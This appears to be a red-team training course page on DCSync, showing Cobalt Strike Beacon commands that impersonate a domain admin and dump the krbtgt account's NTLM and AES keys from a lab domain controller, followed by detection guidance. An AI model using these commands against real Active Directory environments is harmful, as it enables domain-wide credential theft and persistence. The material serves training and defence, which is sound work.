DCSync
The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.
This requires GetNCChanges which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.
\
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
beacon> make_token DEV\nlamb F3rrari
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
Credentials:
Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
lm - 0: 207d5e08551c51892309c0cf652c353b
* Primary:Kerberos-Newer-Keys *
Default Salt : DEV.CYBERBOTIC.IOkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
des_cbc_md5 (4096) : 629189372a372fda\
Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).
\
OPSEC
Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).
Find these using the "Suspicious Directory Replication" saved search in Kibana.
\
\
Replication traffic usually only occurs between domain controllers but can also be seen via applications such as Azure AD Connect. Mature organisations should baseline typical DRS traffic to find suspicious outliers.
Last updated